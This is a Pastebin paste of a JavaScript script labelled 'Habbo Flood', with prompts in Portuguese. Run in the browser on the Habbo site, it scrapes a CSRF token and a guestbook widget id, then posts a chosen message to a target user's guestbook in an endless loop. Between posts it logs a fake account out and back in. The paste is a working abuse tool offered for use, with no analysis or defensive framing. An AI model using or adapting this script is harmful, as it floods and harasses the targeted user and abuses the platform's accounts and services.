Guest User

Untitled

a guest
May 21st, 2018
209
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.64 KB | None | 0 0
  1. /* Habbo Flood */ function dospammer() { e.open("GET", "/home/" + habbo, true); e.send(); e.onreadystatechange = function () { if (e.readyState == 4 && e.status == 200) { d.getElementsByTagName("html")[0].innerHTML = e.responseText; wid = d.getElementsByClassName("movable widget GuestbookWidget")[0].id; wid = wid.toString().replace("widget-", ""); app = $$("meta[name=csrf-token]")[0].readAttribute("content"); new Ajax.Request("/myhabbo/guestbook/add", { parameters: "ownerId=123&message=" + msg + "&scope=0&query=&widgetId=" + wid, onComplete: function () { new Ajax.Request("/account/logout_ok", { parameters: "token=" + app, onComplete: function () { new Ajax.Request("/account/submit", { onComplete: function () { new Ajax.Request("/identity/useOrCreateAvatar/" + habboid, { parameters: "disableFriendLinking=true", onComplete: function () { dospammer() } }) }, parameters: "credentials.username=" + email + "&credentials.password=" + senha }) } }) } }) } } } function checkc() { habbo = prompt("Digite o Habbo Que vai recebe os recado!:", ""); email = prompt("Digite o email de um fake seu!:", ""); senha = prompt("Digite a senha de seu fake:", ""); msg = prompt("Digite a mensagem que vai pra home do habbo escolido:", ""); habboid = prompt("Apenas confirme essa mensagem!", habboId) } Overlay.show(); e = new XMLHttpRequest; checkc(); if (habbo == null || habbo == "" || email == null || email == "" || senha == null || senha == "" || msg == null || msg == "" || isNaN(habboid) || habboid.length < 6) { alert("Você preencheu campo(s) inválido(s)"); if (confirm("Quer tentar novamente?")) { checkc(); } else { location.reload(); throw "lol" } } d = document; dospammer()
Add Comment
Please, Sign In to add comment